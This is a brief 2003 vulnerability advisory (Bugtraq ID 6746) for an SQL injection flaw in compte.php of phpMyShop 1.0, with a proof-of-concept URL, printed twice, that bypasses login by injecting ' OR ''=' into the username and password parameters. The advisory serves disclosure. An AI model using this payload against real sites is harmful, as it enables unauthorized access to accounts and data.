phpMyShop compte.php SQL Injection Vulnerability
BID:6746
Info
phpMyShop compte.php SQL Injection Vulnerability
| Bugtraq ID: | 6746 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 03 2003 12:00AM |
| Updated: | Feb 03 2003 12:00AM |
| Credit: | Discovery of this vulnerability credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Julien Desaunay phpMyShop 1.0 |
| Not Vulnerable: | |
Exploit / POC
phpMyShop compte.php SQL Injection Vulnerability
"Frog Man" <[email protected]> has provided the following proof of concept:
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password=
'%20OR%20''='
"Frog Man" <[email protected]> has provided the following proof of concept:
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password=
'%20OR%20''='